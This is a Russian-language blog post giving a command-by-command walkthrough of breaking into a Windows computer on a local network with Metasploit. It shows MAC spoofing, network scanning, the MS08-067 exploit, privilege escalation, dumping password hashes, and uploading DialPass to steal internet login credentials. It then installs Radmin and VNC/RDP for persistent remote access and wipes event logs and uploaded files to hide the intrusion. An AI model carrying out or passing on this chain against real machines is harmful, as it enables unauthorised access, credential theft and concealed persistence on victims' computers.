Metasploit Framework в бою
Организация взлома ПК внутри локальной сети посредством Metasploit Framework
Далее комментарии по происходящему. В начале меняем свой MAC адрес при помощи пакета macchanger.
sudo macchanger eth0 --mac=00:11:22:33:44:55
Перед этой процедурой интерфейс eth0 должен быть отключен вот так:
sudo ifconfig eth0 down
Далее включаем интерфейс eth0 и смотрим изменился ли MAC адрес1 sudo ifconfig eth0 up ifconfig eth0 Используя пакет arp-scan посмотрим кто есть в сети:
sudo arp-scan -l -I eth0
Выбираем жертву и смотрим на открытые порты посредством nmap
nmap 192.168.84.58
135/tcp msrpc навел на мысль о возможной дыре в безопасности данного пк т.е. о ms08-067. Уязвимость в библиотеке netapi32.dll при выполнении RPC запросов к службе Server. С помощью специально сформированного RPC запроса можно вызвать переполнение буфера и вызвать отказ в обслуживании системы, либо выполнить произвольный код от учетной записи SYSTEM. Подробнее… Далее для исполнения данной атаки запускаем Metasploit Framework и загружаем эксплоит для данной ошибки.
msfconsole
use exploit/windows/smb/ms08_067_netapi Смотрим на обязательные параметры эксплоита и заполняем их.
show options
set RHOST 192.168.84.58 Проверяем есть ли уязвимость, видим что есть, атакуем.1 check exploit Узнаем наши права в системе и если необходимо повышаем привилегий до системных.
getuid
getsystem Далее вытаскиваем пароли, брутим их по словарю в SAMInside1 hashdump Заливаем DialPass на компьютер жертвы и уводим логин и пароль на доступ в интернет. Удаляем следы данной операции. upload exploit/dialpass/dp.exe dp.exe execute -f "dp.exe /stext dp" cat dp del dp dp.exe Заливаем Radmin для дальнейшего эксплуатации данного компьютера. Смотрим в новой консоли открылся ли порт и удаляем следы данной операции. upload exploit/radmin/radmin.exe radmin.exe execute -f "radmin.exe" nmap 192.168.84.58 del radmin.exe Запускаем VNC соединение (прим. для этого необходимо установить пакет vncviewer) и настраиваем RDP доступ к компьютеру (Radmin это хорошо, но мало ли что случится).1 run vnc Ну а далее запускаем remmina, подключаемся по RDP и удаляем лишние файлы. Далее зачищаем за собой и уходим. Удаляем хост из базы Metasploit Framework. clearev exit hosts -d 192.168.84.58 Смотрим какие порты открыты и убеждаемся, что Radmin и RDP функционируют.
nmap 192.168.84.58
Вот так я порутал свой PC =).
источник: chelaxe.ru
| |
Комментарии
Отправить комментарий